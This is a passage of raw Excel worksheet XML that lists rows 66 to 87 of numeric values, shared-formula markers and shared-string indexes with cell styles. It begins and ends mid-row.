      <c r="AE66" s="8"/>
      <c r="AF66" s="27"/>
      <c r="AG66" s="28"/>
      <c r="AH66" s="28"/>
      <c r="AI66" s="28"/>
    </row>
    <row r="67">
      <c r="A67" s="6">
        <f t="shared" si="1"/>
        <v>0.08952743684</v>
      </c>
      <c r="B67" s="6">
        <v>4.8745814E7</v>
      </c>
      <c r="C67" s="6">
        <v>1.0</v>
      </c>
      <c r="D67" s="6">
        <v>4.877752E7</v>
      </c>
      <c r="E67" s="8"/>
      <c r="F67" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G67" s="8"/>
      <c r="H67" s="6">
        <v>0.0</v>
      </c>
      <c r="I67" s="6">
        <v>654.0</v>
      </c>
      <c r="J67" s="20"/>
      <c r="K67" s="20"/>
      <c r="L67" s="20"/>
      <c r="M67" s="20"/>
      <c r="N67" s="20"/>
      <c r="O67" s="4" t="s">
        <v>288</v>
      </c>
      <c r="P67" s="4" t="s">
        <v>289</v>
      </c>
      <c r="Q67" s="6">
        <v>8331098.0</v>
      </c>
      <c r="R67" s="8"/>
      <c r="S67" s="8"/>
      <c r="T67" s="8"/>
      <c r="U67" s="8"/>
      <c r="V67" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W67" s="2" t="s">
        <v>290</v>
      </c>
      <c r="X67" s="6">
        <v>1.0</v>
      </c>
      <c r="Y67" s="6">
        <v>2.0</v>
      </c>
      <c r="Z67" s="6">
        <v>0.0</v>
      </c>
      <c r="AA67" s="8"/>
      <c r="AB67" s="8"/>
      <c r="AC67" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE67" s="8"/>
      <c r="AF67" s="14"/>
    </row>
    <row r="68">
      <c r="A68" s="6">
        <f t="shared" si="1"/>
        <v>0.8368482957</v>
      </c>
      <c r="B68" s="6">
        <v>6.9468688E7</v>
      </c>
      <c r="C68" s="6">
        <v>1.0</v>
      </c>
      <c r="D68" s="7"/>
      <c r="E68" s="8"/>
      <c r="F68" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G68" s="8"/>
      <c r="H68" s="6">
        <v>5.0</v>
      </c>
      <c r="I68" s="6">
        <v>430.0</v>
      </c>
      <c r="J68" s="17"/>
      <c r="K68" s="17"/>
      <c r="L68" s="17"/>
      <c r="M68" s="17"/>
      <c r="N68" s="17"/>
      <c r="O68" s="4" t="s">
        <v>291</v>
      </c>
      <c r="P68" s="4" t="s">
        <v>292</v>
      </c>
      <c r="Q68" s="6">
        <v>1.7090827E7</v>
      </c>
      <c r="R68" s="7"/>
      <c r="S68" s="6">
        <v>1841839.0</v>
      </c>
      <c r="T68" s="7"/>
      <c r="U68" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V68" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W68" s="2" t="s">
        <v>293</v>
      </c>
      <c r="X68" s="6">
        <v>0.0</v>
      </c>
      <c r="Y68" s="6">
        <v>2.0</v>
      </c>
      <c r="Z68" s="6">
        <v>0.0</v>
      </c>
      <c r="AA68" s="7"/>
      <c r="AB68" s="7"/>
      <c r="AC68" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE68" s="8"/>
      <c r="AF68" s="15"/>
    </row>
    <row r="69">
      <c r="A69" s="6">
        <f t="shared" si="1"/>
        <v>0.6028834896</v>
      </c>
      <c r="B69" s="6">
        <v>2.0757391E7</v>
      </c>
      <c r="C69" s="6">
        <v>1.0</v>
      </c>
      <c r="D69" s="8"/>
      <c r="E69" s="8"/>
      <c r="F69" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G69" s="8"/>
      <c r="H69" s="6">
        <v>1.0</v>
      </c>
      <c r="I69" s="6">
        <v>495.0</v>
      </c>
      <c r="J69" s="17"/>
      <c r="K69" s="17"/>
      <c r="L69" s="17"/>
      <c r="M69" s="17"/>
      <c r="N69" s="17"/>
      <c r="O69" s="4" t="s">
        <v>294</v>
      </c>
      <c r="P69" s="4" t="s">
        <v>295</v>
      </c>
      <c r="Q69" s="6">
        <v>2019290.0</v>
      </c>
      <c r="R69" s="7"/>
      <c r="S69" s="7"/>
      <c r="T69" s="7"/>
      <c r="U69" s="7"/>
      <c r="V69" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W69" s="2" t="s">
        <v>296</v>
      </c>
      <c r="X69" s="6">
        <v>1.0</v>
      </c>
      <c r="Y69" s="6">
        <v>0.0</v>
      </c>
      <c r="Z69" s="6">
        <v>0.0</v>
      </c>
      <c r="AA69" s="7"/>
      <c r="AB69" s="7"/>
      <c r="AC69" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE69" s="8"/>
      <c r="AF69" s="15"/>
    </row>
    <row r="70">
      <c r="A70" s="6">
        <f t="shared" si="1"/>
        <v>0.1106573495</v>
      </c>
      <c r="B70" s="6">
        <v>4.5670079E7</v>
      </c>
      <c r="C70" s="6">
        <v>1.0</v>
      </c>
      <c r="D70" s="8"/>
      <c r="E70" s="8"/>
      <c r="F70" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G70" s="8"/>
      <c r="H70" s="6">
        <v>2.0</v>
      </c>
      <c r="I70" s="6">
        <v>440.0</v>
      </c>
      <c r="J70" s="20"/>
      <c r="K70" s="20"/>
      <c r="L70" s="20"/>
      <c r="M70" s="20"/>
      <c r="N70" s="20"/>
      <c r="O70" s="4" t="s">
        <v>297</v>
      </c>
      <c r="P70" s="4" t="s">
        <v>298</v>
      </c>
      <c r="Q70" s="6">
        <v>3114742.0</v>
      </c>
      <c r="R70" s="8"/>
      <c r="S70" s="8"/>
      <c r="T70" s="8"/>
      <c r="U70" s="8"/>
      <c r="V70" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W70" s="2" t="s">
        <v>299</v>
      </c>
      <c r="X70" s="6">
        <v>0.0</v>
      </c>
      <c r="Y70" s="6">
        <v>4.0</v>
      </c>
      <c r="Z70" s="8"/>
      <c r="AA70" s="8"/>
      <c r="AB70" s="8"/>
      <c r="AC70" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE70" s="8"/>
      <c r="AF70" s="14"/>
    </row>
    <row r="71">
      <c r="A71" s="6">
        <f t="shared" si="1"/>
        <v>0.8026148033</v>
      </c>
      <c r="B71" s="6">
        <v>7.337411E7</v>
      </c>
      <c r="C71" s="6">
        <v>1.0</v>
      </c>
      <c r="D71" s="8"/>
      <c r="E71" s="8"/>
      <c r="F71" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G71" s="8"/>
      <c r="H71" s="6">
        <v>0.0</v>
      </c>
      <c r="I71" s="6">
        <v>5406.0</v>
      </c>
      <c r="J71" s="20"/>
      <c r="K71" s="20"/>
      <c r="L71" s="20"/>
      <c r="M71" s="20"/>
      <c r="N71" s="20"/>
      <c r="O71" s="4" t="s">
        <v>300</v>
      </c>
      <c r="P71" s="4" t="s">
        <v>301</v>
      </c>
      <c r="Q71" s="6">
        <v>1.011753E7</v>
      </c>
      <c r="R71" s="8"/>
      <c r="S71" s="8"/>
      <c r="T71" s="8"/>
      <c r="U71" s="8"/>
      <c r="V71" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W71" s="2" t="s">
        <v>302</v>
      </c>
      <c r="X71" s="6">
        <v>1.0</v>
      </c>
      <c r="Y71" s="6">
        <v>1.0</v>
      </c>
      <c r="Z71" s="8"/>
      <c r="AA71" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB71" s="8"/>
      <c r="AC71" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE71" s="8"/>
      <c r="AF71" s="14"/>
    </row>
    <row r="72">
      <c r="A72" s="6">
        <f t="shared" si="1"/>
        <v>0.7148971498</v>
      </c>
      <c r="B72" s="6">
        <v>7.6522063E7</v>
      </c>
      <c r="C72" s="6">
        <v>1.0</v>
      </c>
      <c r="D72" s="7"/>
      <c r="E72" s="8"/>
      <c r="F72" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G72" s="8"/>
      <c r="H72" s="6">
        <v>0.0</v>
      </c>
      <c r="I72" s="6">
        <v>33.0</v>
      </c>
      <c r="J72" s="17"/>
      <c r="K72" s="17"/>
      <c r="L72" s="17"/>
      <c r="M72" s="17"/>
      <c r="N72" s="17"/>
      <c r="O72" s="4" t="s">
        <v>303</v>
      </c>
      <c r="P72" s="4" t="s">
        <v>304</v>
      </c>
      <c r="Q72" s="6">
        <v>7593324.0</v>
      </c>
      <c r="R72" s="7"/>
      <c r="S72" s="7"/>
      <c r="T72" s="7"/>
      <c r="U72" s="8"/>
      <c r="V72" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W72" s="2" t="s">
        <v>305</v>
      </c>
      <c r="X72" s="6">
        <v>0.0</v>
      </c>
      <c r="Y72" s="6">
        <v>4.0</v>
      </c>
      <c r="Z72" s="7"/>
      <c r="AA72" s="7"/>
      <c r="AB72" s="7"/>
      <c r="AC72" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE72" s="8"/>
      <c r="AF72" s="15"/>
    </row>
    <row r="73">
      <c r="A73" s="6">
        <f t="shared" si="1"/>
        <v>0.8105639093</v>
      </c>
      <c r="B73" s="6">
        <v>5.822147E7</v>
      </c>
      <c r="C73" s="6">
        <v>1.0</v>
      </c>
      <c r="D73" s="6">
        <v>5.8222979E7</v>
      </c>
      <c r="E73" s="8"/>
      <c r="F73" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G73" s="8"/>
      <c r="H73" s="6">
        <v>0.0</v>
      </c>
      <c r="I73" s="6">
        <v>644.0</v>
      </c>
      <c r="J73" s="17"/>
      <c r="K73" s="17"/>
      <c r="L73" s="17"/>
      <c r="M73" s="17"/>
      <c r="N73" s="17"/>
      <c r="O73" s="4" t="s">
        <v>306</v>
      </c>
      <c r="P73" s="4" t="s">
        <v>307</v>
      </c>
      <c r="Q73" s="6">
        <v>1.0329877E7</v>
      </c>
      <c r="R73" s="7"/>
      <c r="S73" s="6">
        <v>1.0329877E7</v>
      </c>
      <c r="T73" s="7"/>
      <c r="U73" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V73" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W73" s="2" t="s">
        <v>308</v>
      </c>
      <c r="X73" s="6">
        <v>1.0</v>
      </c>
      <c r="Y73" s="6">
        <v>5.0</v>
      </c>
      <c r="Z73" s="7"/>
      <c r="AA73" s="7"/>
      <c r="AB73" s="7"/>
      <c r="AC73" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE73" s="8"/>
      <c r="AF73" s="15"/>
    </row>
    <row r="74">
      <c r="A74" s="6">
        <f t="shared" si="1"/>
        <v>0.663919536</v>
      </c>
      <c r="B74" s="6">
        <v>4.6540383E7</v>
      </c>
      <c r="C74" s="6">
        <v>1.0</v>
      </c>
      <c r="D74" s="6">
        <v>4.6540463E7</v>
      </c>
      <c r="E74" s="8"/>
      <c r="F74" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G74" s="8"/>
      <c r="H74" s="6">
        <v>-1.0</v>
      </c>
      <c r="I74" s="6">
        <v>168.0</v>
      </c>
      <c r="J74" s="20"/>
      <c r="K74" s="20"/>
      <c r="L74" s="20"/>
      <c r="M74" s="20"/>
      <c r="N74" s="20"/>
      <c r="O74" s="4" t="s">
        <v>309</v>
      </c>
      <c r="P74" s="4" t="s">
        <v>310</v>
      </c>
      <c r="Q74" s="6">
        <v>2318830.0</v>
      </c>
      <c r="R74" s="8"/>
      <c r="S74" s="8"/>
      <c r="T74" s="8"/>
      <c r="U74" s="8"/>
      <c r="V74" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W74" s="2" t="s">
        <v>311</v>
      </c>
      <c r="X74" s="6">
        <v>1.0</v>
      </c>
      <c r="Y74" s="6">
        <v>2.0</v>
      </c>
      <c r="Z74" s="8"/>
      <c r="AA74" s="8"/>
      <c r="AB74" s="8"/>
      <c r="AC74" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE74" s="8"/>
      <c r="AF74" s="14"/>
    </row>
    <row r="75">
      <c r="A75" s="6">
        <f t="shared" si="1"/>
        <v>0.8130393448</v>
      </c>
      <c r="B75" s="6">
        <v>4.0964194E7</v>
      </c>
      <c r="C75" s="6">
        <v>1.0</v>
      </c>
      <c r="D75" s="6">
        <v>4.230541E7</v>
      </c>
      <c r="E75" s="8"/>
      <c r="F75" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G75" s="8"/>
      <c r="H75" s="6">
        <v>15.0</v>
      </c>
      <c r="I75" s="6">
        <v>4304.0</v>
      </c>
      <c r="J75" s="17"/>
      <c r="K75" s="17"/>
      <c r="L75" s="17"/>
      <c r="M75" s="17"/>
      <c r="N75" s="17"/>
      <c r="O75" s="4" t="s">
        <v>312</v>
      </c>
      <c r="P75" s="4" t="s">
        <v>313</v>
      </c>
      <c r="Q75" s="6">
        <v>3122886.0</v>
      </c>
      <c r="R75" s="7"/>
      <c r="S75" s="6">
        <v>3957402.0</v>
      </c>
      <c r="T75" s="7"/>
      <c r="U75" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V75" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W75" s="2" t="s">
        <v>314</v>
      </c>
      <c r="X75" s="6">
        <v>4.0</v>
      </c>
      <c r="Y75" s="6">
        <v>1.0</v>
      </c>
      <c r="Z75" s="6">
        <v>0.0</v>
      </c>
      <c r="AA75" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB75" s="7"/>
      <c r="AC75" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE75" s="8"/>
      <c r="AF75" s="15"/>
    </row>
    <row r="76">
      <c r="A76" s="6">
        <f t="shared" si="1"/>
        <v>0.8962865621</v>
      </c>
      <c r="B76" s="6">
        <v>1.0871289E7</v>
      </c>
      <c r="C76" s="6">
        <v>1.0</v>
      </c>
      <c r="D76" s="8"/>
      <c r="E76" s="8"/>
      <c r="F76" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G76" s="8"/>
      <c r="H76" s="6">
        <v>0.0</v>
      </c>
      <c r="I76" s="6">
        <v>5849.0</v>
      </c>
      <c r="J76" s="17"/>
      <c r="K76" s="17"/>
      <c r="L76" s="17"/>
      <c r="M76" s="17"/>
      <c r="N76" s="17"/>
      <c r="O76" s="4" t="s">
        <v>315</v>
      </c>
      <c r="P76" s="4" t="s">
        <v>316</v>
      </c>
      <c r="Q76" s="6">
        <v>1433593.0</v>
      </c>
      <c r="R76" s="7"/>
      <c r="S76" s="7"/>
      <c r="T76" s="7"/>
      <c r="U76" s="8"/>
      <c r="V76" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W76" s="2" t="s">
        <v>317</v>
      </c>
      <c r="X76" s="6">
        <v>3.0</v>
      </c>
      <c r="Y76" s="6">
        <v>0.0</v>
      </c>
      <c r="Z76" s="7"/>
      <c r="AA76" s="7"/>
      <c r="AB76" s="7"/>
      <c r="AC76" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE76" s="8"/>
      <c r="AF76" s="15"/>
    </row>
    <row r="77">
      <c r="A77" s="6">
        <f t="shared" si="1"/>
        <v>0.3098927894</v>
      </c>
      <c r="B77" s="6">
        <v>1.6521247E7</v>
      </c>
      <c r="C77" s="6">
        <v>1.0</v>
      </c>
      <c r="D77" s="8"/>
      <c r="E77" s="8"/>
      <c r="F77" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G77" s="8"/>
      <c r="H77" s="6">
        <v>0.0</v>
      </c>
      <c r="I77" s="6">
        <v>4959.0</v>
      </c>
      <c r="J77" s="17"/>
      <c r="K77" s="17"/>
      <c r="L77" s="17"/>
      <c r="M77" s="17"/>
      <c r="N77" s="17"/>
      <c r="O77" s="4" t="s">
        <v>318</v>
      </c>
      <c r="P77" s="4" t="s">
        <v>319</v>
      </c>
      <c r="Q77" s="6">
        <v>2377493.0</v>
      </c>
      <c r="R77" s="7"/>
      <c r="S77" s="7"/>
      <c r="T77" s="7"/>
      <c r="U77" s="8"/>
      <c r="V77" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W77" s="2" t="s">
        <v>320</v>
      </c>
      <c r="X77" s="6">
        <v>2.0</v>
      </c>
      <c r="Y77" s="6">
        <v>2.0</v>
      </c>
      <c r="Z77" s="6">
        <v>0.0</v>
      </c>
      <c r="AA77" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AB77" s="7"/>
      <c r="AC77" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE77" s="8"/>
      <c r="AF77" s="15"/>
    </row>
    <row r="78">
      <c r="A78" s="6">
        <f t="shared" si="1"/>
        <v>0.6807676178</v>
      </c>
      <c r="B78" s="6">
        <v>7.6493642E7</v>
      </c>
      <c r="C78" s="6">
        <v>1.0</v>
      </c>
      <c r="D78" s="8"/>
      <c r="E78" s="8"/>
      <c r="F78" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G78" s="8"/>
      <c r="H78" s="6">
        <v>0.0</v>
      </c>
      <c r="I78" s="6">
        <v>5.0</v>
      </c>
      <c r="J78" s="17"/>
      <c r="K78" s="17"/>
      <c r="L78" s="17"/>
      <c r="M78" s="17"/>
      <c r="N78" s="17"/>
      <c r="O78" s="4" t="s">
        <v>321</v>
      </c>
      <c r="P78" s="4" t="s">
        <v>322</v>
      </c>
      <c r="Q78" s="6">
        <v>2.0092032E7</v>
      </c>
      <c r="R78" s="7"/>
      <c r="S78" s="7"/>
      <c r="T78" s="7"/>
      <c r="U78" s="8"/>
      <c r="V78" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W78" s="2" t="s">
        <v>323</v>
      </c>
      <c r="X78" s="6">
        <v>0.0</v>
      </c>
      <c r="Y78" s="6">
        <v>0.0</v>
      </c>
      <c r="Z78" s="7"/>
      <c r="AA78" s="7"/>
      <c r="AB78" s="7"/>
      <c r="AC78" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE78" s="8"/>
      <c r="AF78" s="15"/>
    </row>
    <row r="79">
      <c r="A79" s="6">
        <f t="shared" si="1"/>
        <v>0.6963560597</v>
      </c>
      <c r="B79" s="6">
        <v>1.9308006E7</v>
      </c>
      <c r="C79" s="6">
        <v>1.0</v>
      </c>
      <c r="D79" s="6">
        <v>2.4372576E7</v>
      </c>
      <c r="E79" s="8"/>
      <c r="F79" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G79" s="8"/>
      <c r="H79" s="6">
        <v>-4.0</v>
      </c>
      <c r="I79" s="6">
        <v>1317.0</v>
      </c>
      <c r="J79" s="17"/>
      <c r="K79" s="17"/>
      <c r="L79" s="17"/>
      <c r="M79" s="17"/>
      <c r="N79" s="17"/>
      <c r="O79" s="4" t="s">
        <v>324</v>
      </c>
      <c r="P79" s="4" t="s">
        <v>325</v>
      </c>
      <c r="Q79" s="6">
        <v>1060378.0</v>
      </c>
      <c r="R79" s="7"/>
      <c r="S79" s="6">
        <v>-1.0</v>
      </c>
      <c r="T79" s="7"/>
      <c r="U79" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V79" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W79" s="2" t="s">
        <v>326</v>
      </c>
      <c r="X79" s="6">
        <v>2.0</v>
      </c>
      <c r="Y79" s="6">
        <v>0.0</v>
      </c>
      <c r="Z79" s="7"/>
      <c r="AA79" s="7"/>
      <c r="AB79" s="7"/>
      <c r="AC79" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE79" s="8"/>
      <c r="AF79" s="15"/>
    </row>
    <row r="80">
      <c r="A80" s="6">
        <f t="shared" si="1"/>
        <v>0.1708278199</v>
      </c>
      <c r="B80" s="6">
        <v>7.5335435E7</v>
      </c>
      <c r="C80" s="6">
        <v>1.0</v>
      </c>
      <c r="D80" s="8"/>
      <c r="E80" s="8"/>
      <c r="F80" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G80" s="8"/>
      <c r="H80" s="6">
        <v>0.0</v>
      </c>
      <c r="I80" s="6">
        <v>12.0</v>
      </c>
      <c r="J80" s="20"/>
      <c r="K80" s="20"/>
      <c r="L80" s="20"/>
      <c r="M80" s="20"/>
      <c r="N80" s="20"/>
      <c r="O80" s="4" t="s">
        <v>327</v>
      </c>
      <c r="P80" s="4" t="s">
        <v>328</v>
      </c>
      <c r="Q80" s="6">
        <v>2.1140057E7</v>
      </c>
      <c r="R80" s="8"/>
      <c r="S80" s="8"/>
      <c r="T80" s="8"/>
      <c r="U80" s="8"/>
      <c r="V80" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W80" s="2" t="s">
        <v>329</v>
      </c>
      <c r="X80" s="6">
        <v>0.0</v>
      </c>
      <c r="Y80" s="6">
        <v>0.0</v>
      </c>
      <c r="Z80" s="8"/>
      <c r="AA80" s="8"/>
      <c r="AB80" s="8"/>
      <c r="AC80" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE80" s="8"/>
      <c r="AF80" s="14"/>
    </row>
    <row r="81">
      <c r="A81" s="6">
        <f t="shared" si="1"/>
        <v>0.6682024144</v>
      </c>
      <c r="B81" s="6">
        <v>2179783.0</v>
      </c>
      <c r="C81" s="6">
        <v>1.0</v>
      </c>
      <c r="D81" s="7"/>
      <c r="E81" s="8"/>
      <c r="F81" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G81" s="8"/>
      <c r="H81" s="6">
        <v>7.0</v>
      </c>
      <c r="I81" s="6">
        <v>1369.0</v>
      </c>
      <c r="J81" s="17"/>
      <c r="K81" s="17"/>
      <c r="L81" s="17"/>
      <c r="M81" s="17"/>
      <c r="N81" s="17"/>
      <c r="O81" s="4" t="s">
        <v>330</v>
      </c>
      <c r="P81" s="4" t="s">
        <v>331</v>
      </c>
      <c r="Q81" s="6">
        <v>17803.0</v>
      </c>
      <c r="R81" s="7"/>
      <c r="S81" s="7"/>
      <c r="T81" s="7"/>
      <c r="U81" s="7"/>
      <c r="V81" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W81" s="2" t="s">
        <v>332</v>
      </c>
      <c r="X81" s="6">
        <v>6.0</v>
      </c>
      <c r="Y81" s="6">
        <v>0.0</v>
      </c>
      <c r="Z81" s="6">
        <v>0.0</v>
      </c>
      <c r="AA81" s="7"/>
      <c r="AB81" s="9" t="s">
        <v>30</v>
      </c>
      <c r="AC81" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE81" s="8"/>
      <c r="AF81" s="15"/>
    </row>
    <row r="82">
      <c r="A82" s="6">
        <f t="shared" si="1"/>
        <v>0.9622262357</v>
      </c>
      <c r="B82" s="6">
        <v>1.2867972E7</v>
      </c>
      <c r="C82" s="6">
        <v>1.0</v>
      </c>
      <c r="D82" s="8"/>
      <c r="E82" s="8"/>
      <c r="F82" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G82" s="8"/>
      <c r="H82" s="6">
        <v>3.0</v>
      </c>
      <c r="I82" s="6">
        <v>897.0</v>
      </c>
      <c r="J82" s="20"/>
      <c r="K82" s="20"/>
      <c r="L82" s="20"/>
      <c r="M82" s="20"/>
      <c r="N82" s="20"/>
      <c r="O82" s="4" t="s">
        <v>333</v>
      </c>
      <c r="P82" s="4" t="s">
        <v>334</v>
      </c>
      <c r="Q82" s="6">
        <v>818227.0</v>
      </c>
      <c r="R82" s="8"/>
      <c r="S82" s="8"/>
      <c r="T82" s="8"/>
      <c r="U82" s="8"/>
      <c r="V82" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W82" s="2" t="s">
        <v>335</v>
      </c>
      <c r="X82" s="6">
        <v>1.0</v>
      </c>
      <c r="Y82" s="6">
        <v>2.0</v>
      </c>
      <c r="Z82" s="6">
        <v>0.0</v>
      </c>
      <c r="AA82" s="8"/>
      <c r="AB82" s="8"/>
      <c r="AC82" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE82" s="8"/>
      <c r="AF82" s="14"/>
    </row>
    <row r="83">
      <c r="A83" s="6">
        <f t="shared" si="1"/>
        <v>0.5080307283</v>
      </c>
      <c r="B83" s="6">
        <v>2.8052466E7</v>
      </c>
      <c r="C83" s="6">
        <v>1.0</v>
      </c>
      <c r="D83" s="8"/>
      <c r="E83" s="8"/>
      <c r="F83" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G83" s="8"/>
      <c r="H83" s="6">
        <v>1.0</v>
      </c>
      <c r="I83" s="6">
        <v>1563.0</v>
      </c>
      <c r="J83" s="20"/>
      <c r="K83" s="20"/>
      <c r="L83" s="20"/>
      <c r="M83" s="20"/>
      <c r="N83" s="20"/>
      <c r="O83" s="4" t="s">
        <v>336</v>
      </c>
      <c r="P83" s="4" t="s">
        <v>337</v>
      </c>
      <c r="Q83" s="6">
        <v>213633.0</v>
      </c>
      <c r="R83" s="8"/>
      <c r="S83" s="8"/>
      <c r="T83" s="8"/>
      <c r="U83" s="8"/>
      <c r="V83" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W83" s="2" t="s">
        <v>338</v>
      </c>
      <c r="X83" s="6">
        <v>1.0</v>
      </c>
      <c r="Y83" s="6">
        <v>0.0</v>
      </c>
      <c r="Z83" s="8"/>
      <c r="AA83" s="8"/>
      <c r="AB83" s="8"/>
      <c r="AC83" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE83" s="8"/>
      <c r="AF83" s="14"/>
    </row>
    <row r="84">
      <c r="A84" s="6">
        <f t="shared" si="1"/>
        <v>0.1870568869</v>
      </c>
      <c r="B84" s="6">
        <v>1.8266096E7</v>
      </c>
      <c r="C84" s="6">
        <v>1.0</v>
      </c>
      <c r="D84" s="7"/>
      <c r="E84" s="8"/>
      <c r="F84" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G84" s="8"/>
      <c r="H84" s="6">
        <v>0.0</v>
      </c>
      <c r="I84" s="6">
        <v>361.0</v>
      </c>
      <c r="J84" s="17"/>
      <c r="K84" s="17"/>
      <c r="L84" s="17"/>
      <c r="M84" s="17"/>
      <c r="N84" s="17"/>
      <c r="O84" s="4" t="s">
        <v>339</v>
      </c>
      <c r="P84" s="4" t="s">
        <v>340</v>
      </c>
      <c r="Q84" s="6">
        <v>2413868.0</v>
      </c>
      <c r="R84" s="7"/>
      <c r="S84" s="7"/>
      <c r="T84" s="7"/>
      <c r="U84" s="8"/>
      <c r="V84" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W84" s="2" t="s">
        <v>341</v>
      </c>
      <c r="X84" s="6">
        <v>1.0</v>
      </c>
      <c r="Y84" s="6">
        <v>0.0</v>
      </c>
      <c r="Z84" s="7"/>
      <c r="AA84" s="7"/>
      <c r="AB84" s="7"/>
      <c r="AC84" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE84" s="8"/>
      <c r="AF84" s="15"/>
    </row>
    <row r="85">
      <c r="A85" s="6">
        <f t="shared" si="1"/>
        <v>0.08528614195</v>
      </c>
      <c r="B85" s="6">
        <v>5.7691879E7</v>
      </c>
      <c r="C85" s="6">
        <v>1.0</v>
      </c>
      <c r="D85" s="8"/>
      <c r="E85" s="8"/>
      <c r="F85" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G85" s="8"/>
      <c r="H85" s="6">
        <v>1.0</v>
      </c>
      <c r="I85" s="6">
        <v>550.0</v>
      </c>
      <c r="J85" s="17"/>
      <c r="K85" s="17"/>
      <c r="L85" s="17"/>
      <c r="M85" s="17"/>
      <c r="N85" s="17"/>
      <c r="O85" s="4" t="s">
        <v>342</v>
      </c>
      <c r="P85" s="4" t="s">
        <v>343</v>
      </c>
      <c r="Q85" s="6">
        <v>1.0898715E7</v>
      </c>
      <c r="R85" s="7"/>
      <c r="S85" s="7"/>
      <c r="T85" s="7"/>
      <c r="U85" s="8"/>
      <c r="V85" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W85" s="2" t="s">
        <v>344</v>
      </c>
      <c r="X85" s="6">
        <v>0.0</v>
      </c>
      <c r="Y85" s="6">
        <v>3.0</v>
      </c>
      <c r="Z85" s="7"/>
      <c r="AA85" s="7"/>
      <c r="AB85" s="7"/>
      <c r="AC85" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE85" s="8"/>
      <c r="AF85" s="15"/>
    </row>
    <row r="86">
      <c r="A86" s="6">
        <f t="shared" si="1"/>
        <v>0.5584897552</v>
      </c>
      <c r="B86" s="6">
        <v>2.0435199E7</v>
      </c>
      <c r="C86" s="6">
        <v>1.0</v>
      </c>
      <c r="D86" s="7"/>
      <c r="E86" s="8"/>
      <c r="F86" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G86" s="8"/>
      <c r="H86" s="6">
        <v>0.0</v>
      </c>
      <c r="I86" s="6">
        <v>62.0</v>
      </c>
      <c r="J86" s="17"/>
      <c r="K86" s="17"/>
      <c r="L86" s="17"/>
      <c r="M86" s="17"/>
      <c r="N86" s="17"/>
      <c r="O86" s="4" t="s">
        <v>345</v>
      </c>
      <c r="P86" s="4" t="s">
        <v>346</v>
      </c>
      <c r="Q86" s="6">
        <v>823392.0</v>
      </c>
      <c r="R86" s="7"/>
      <c r="S86" s="6">
        <v>538551.0</v>
      </c>
      <c r="T86" s="7"/>
      <c r="U86" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V86" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W86" s="2" t="s">
        <v>347</v>
      </c>
      <c r="X86" s="6">
        <v>1.0</v>
      </c>
      <c r="Y86" s="6">
        <v>5.0</v>
      </c>
      <c r="Z86" s="7"/>
      <c r="AA86" s="7"/>
      <c r="AB86" s="7"/>
      <c r="AC86" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE86" s="8"/>
      <c r="AF86" s="15"/>
    </row>
    <row r="87">
      <c r="A87" s="6">
        <f t="shared" si="1"/>
        <v>0.06568895623</v>
      </c>
      <c r="B87" s="6">
        <v>7.41198E7</v>
      </c>
      <c r="C87" s="6">
        <v>1.0</v>
      </c>
      <c r="D87" s="7"/>
